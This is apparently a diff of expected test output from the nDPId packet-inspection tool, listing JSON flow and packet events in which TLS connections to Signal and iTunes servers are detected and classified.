-00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":295,"source":"signal.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569051264666,"flow_last_seen":1569051264666,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569051264666,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":57026,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":295,"source":"signal.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1569051264666,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1569051264666,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAGUS7AqAIRI6kDKN7CAbvJrSrvAAAAALAC\/\/+7dwAAAgQFtAEDAwcBAQgKKFWUiQAAAAAEAgAA"} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":319,"source":"signal.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1569051264775,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1569051264775,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAAO4G4zEjqQMowKgCEQG73sL5Zid4ya0q8KASaN+dwQAAAgQFrAQCCApkFUDdKFWUiQEDAwg="} -00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":320,"source":"signal.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":3,"flow_last_seen":1569051264776,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569051264776,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGUTrAqAIRI6kDKN7CAbvJrSrw+WYneYAQBAsw7wAAAQEICihVlPVkFUDd"} -00905{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":321,"source":"signal.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569051264666,"flow_last_seen":1569051264776,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1569051264776,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":57026,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00961{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":323,"source":"signal.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569051264666,"flow_last_seen":1569051264887,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1569051264887,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":57026,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"1089ea6f0461a29006cc96dfe7a11d80","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -01350{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":324,"source":"signal.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1569051264666,"flow_last_seen":1569051264887,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":2995,"flow_avg_l4_payload_len":427,"midstream":0,"thread_ts_msec":1569051264887,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":57026,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","server_names":"textsecure-service.whispersystems.org,service.signal.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"1089ea6f0461a29006cc96dfe7a11d80","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, ST=California, L=San Francisco, O=Open Whisper Systems, OU=Open Whisper Systems, CN=TextSecure","subjectDN":"C=US, ST=California, O=Open Whisper Systems, OU=Open Whisper Systems, CN=textsecure-service.whispersystems.org","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2","fingerprint":"5E:9E:63:F5:69:45:C7:DC:E6:4D:26:68:36:7E:C2:68:DB:02:60:8B"}} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":357,"source":"signal.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569051266396,"flow_last_seen":1569051266396,"flow_idle_time":7440000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":1,"thread_ts_msec":1569051266396,"l3_proto":"ip4","src_ip":"23.57.24.16","dst_ip":"192.168.2.17","src_port":443,"dst_port":57016,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":357,"source":"signal.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1569051266396,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":90,"pkt_l4_len":56,"thread_ts_msec":1569051266396,"pkt":"xGGLNYKpxiwDYGpkCABFAABMyV0AADQGy0wXORgQwKgCEQG73rjhiC89LB07wYAYAQKY+AAAAQEICpZOcwIoVP9fFwMDABNN53WS+HQ+OdIkNGbGHI++PaTs"} -00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":358,"source":"signal.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1569051266396,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569051266396,"pkt":"xGGLNYKpxiwDYGpkCABFAAA0yV4AADQGy2MXORgQwKgCEQG73rjhiC9VLB07wYARAQL5ggAAAQEICpZOcwIoVP9f"} -00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":359,"source":"signal.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":3,"flow_last_seen":1569051266743,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":90,"pkt_l4_len":56,"thread_ts_msec":1569051266743,"pkt":"xGGLNYKpxiwDYGpkCABFAABMyV8AADQGy0oXORgQwKgCEQG73rjhiC89LB07wYAYAQKXnQAAAQEICpZOdF0oVP9fFwMDABNN53WS+HQ+OdIkNGbGHI++PaTs"} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":373,"source":"signal.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569051267121,"flow_last_seen":1569051267121,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569051267121,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"13.35.253.42","src_port":57027,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":373,"source":"signal.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1569051267121,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1569051267121,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAGbbHAqAIRDSP9Kt7DAbsjR8rsAAAAALAC\/\/\/U1AAAAgQFtAEDAwcBAQgKKFWeFwAAAAAEAgAA"} -00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":374,"source":"signal.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1569051267154,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1569051267154,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAAPEG\/LQNI\/0qwKgCEQG73sO\/wI8zI0fK7aAScSCWtAAAAgQFrAQCCAqvNN\/RKFWeFwEDAwg="} -00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":375,"source":"signal.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":3,"flow_last_seen":1569051267161,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569051267161,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGbb3AqAIRDSP9Kt7DAbsjR8rtv8CPNIAQBAsybAAAAQEICihVnjqvNN\/R"} -00883{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":376,"source":"signal.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569051267121,"flow_last_seen":1569051267161,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1569051267161,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"13.35.253.42","src_port":57027,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"cdn.signal.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00939{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":378,"source":"signal.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569051267121,"flow_last_seen":1569051267197,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1569051267197,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"13.35.253.42","src_port":57027,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"cdn.signal.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"c4b2785a87896e19d37eee932070cb22","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -01263{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":379,"source":"signal.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1569051267121,"flow_last_seen":1569051267197,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":2900,"flow_avg_l4_payload_len":414,"midstream":0,"thread_ts_msec":1569051267197,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"13.35.253.42","src_port":57027,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"cdn.signal.org","server_names":"cdn.signal.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"c4b2785a87896e19d37eee932070cb22","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, ST=California, L=San Francisco, O=Open Whisper Systems, OU=Open Whisper Systems, CN=TextSecure","subjectDN":"C=US, ST=California, O=Open Whisper Systems, OU=Open Whisper Systems, CN=cdn.signal.org","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2","fingerprint":"81:3D:8A:2E:EE:B2:E1:F4:1C:2B:6D:20:16:54:B2:C1:87:D0:1E:12"}} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":181,"source":"signal.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":3,"flow_last_seen":1569051264116,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569051264116,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGSMLAqAIRFzkYEN6+AbvH3a+K4DuqGYAQBAvjSwAAAQEICihVknGWTmoX"} +00894{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":182,"source":"signal.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569051264078,"flow_last_seen":1569051264116,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1569051264116,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"23.57.24.16","src_port":57022,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiTunes","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.2","client_requested_server_name":"itunes.apple.com","ja3":"17305a56a62a10f6b0ee8edcc3b1769c","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00935{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":184,"source":"signal.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569051264078,"flow_last_seen":1569051264151,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1569051264151,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"23.57.24.16","src_port":57022,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiTunes","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.3","client_requested_server_name":"itunes.apple.com","ja3":"17305a56a62a10f6b0ee8edcc3b1769c","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":190,"source":"signal.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1569051264185,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1569051264185,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAAO4G4zEjqQMowKgCEQG7wEvNn9QhBdFlyaASaN\/LpgAAAgQFrAQCCApkFUBJKFWN0AEDAwg="} +00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":191,"source":"signal.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":3,"flow_last_seen":1569051264186,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569051264186,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGUTrAqAIRI6kDKMBLAbsF0WXJzZ\/UIoAQCBZawQAAAQEICihVjkRkFUBJ"} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":193,"source":"signal.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1569051264198,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1569051264198,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAAO4G4zEjqQMowKgCEQG73r+o1iHY6c+USqASaN9tOAAAAgQFrAQCCApkFUBMKFWSWgEDAwg="} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":194,"source":"signal.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":1569051264203,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1569051264203,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAAO4G4zEjqQMowKgCEQG73sBFykuNjtdEXqASaN9RcQAAAgQFrAQCCApkFUBNKFWSWwEDAwg="} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":195,"source":"signal.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1569051264203,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1569051264203,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAAO4G4zEjqQMowKgCEQG73sEV2c5FmCCLjaASaN+uMAAAAgQFrAQCCApkFUBNKFWSWwEDAwg="} +00975{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":196,"source":"signal.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569051264073,"flow_last_seen":1569051264229,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":49,"midstream":0,"thread_ts_msec":1569051264229,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":49227,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":198,"source":"signal.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1569051264259,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569051264259,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGUTrAqAIRI6kDKN6\/Abvpz5RKqNYh2YAQBAsAMQAAAQEICihVkvtkFUBM"} +00905{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":199,"source":"signal.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569051264090,"flow_last_seen":1569051264259,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1569051264259,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":57023,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":200,"source":"signal.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":3,"flow_last_seen":1569051264259,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569051264259,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGUTrAqAIRI6kDKN7AAbuO10ReRcpLjoAQBAvkagAAAQEICihVkvtkFUBN"} +00905{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":201,"source":"signal.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569051264091,"flow_last_seen":1569051264259,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1569051264259,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":57024,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":202,"source":"signal.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":3,"flow_last_seen":1569051264259,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569051264259,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGUTrAqAIRI6kDKN7BAbuYIIuNFdnORoAQBAtBKQAAAQEICihVkvxkFUBN"} +00905{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":203,"source":"signal.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569051264093,"flow_last_seen":1569051264259,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1569051264259,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":57025,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +01032{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":228,"source":"signal.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569051264073,"flow_last_seen":1569051264342,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1637,"flow_avg_l4_payload_len":272,"midstream":0,"thread_ts_msec":1569051264342,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":49227,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} +01421{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":229,"source":"signal.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1569051264073,"flow_last_seen":1569051264343,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":2666,"flow_avg_l4_payload_len":380,"midstream":0,"thread_ts_msec":1569051264343,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":49227,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","server_names":"textsecure-service.whispersystems.org,service.signal.org","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, ST=California, L=San Francisco, O=Open Whisper Systems, OU=Open Whisper Systems, CN=TextSecure","subjectDN":"C=US, ST=California, O=Open Whisper Systems, OU=Open Whisper Systems, CN=textsecure-service.whispersystems.org","fingerprint":"5E:9E:63:F5:69:45:C7:DC:E6:4D:26:68:36:7E:C2:68:DB:02:60:8B"}} +00961{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":233,"source":"signal.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569051264090,"flow_last_seen":1569051264369,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1569051264369,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":57023,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"1089ea6f0461a29006cc96dfe7a11d80","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} 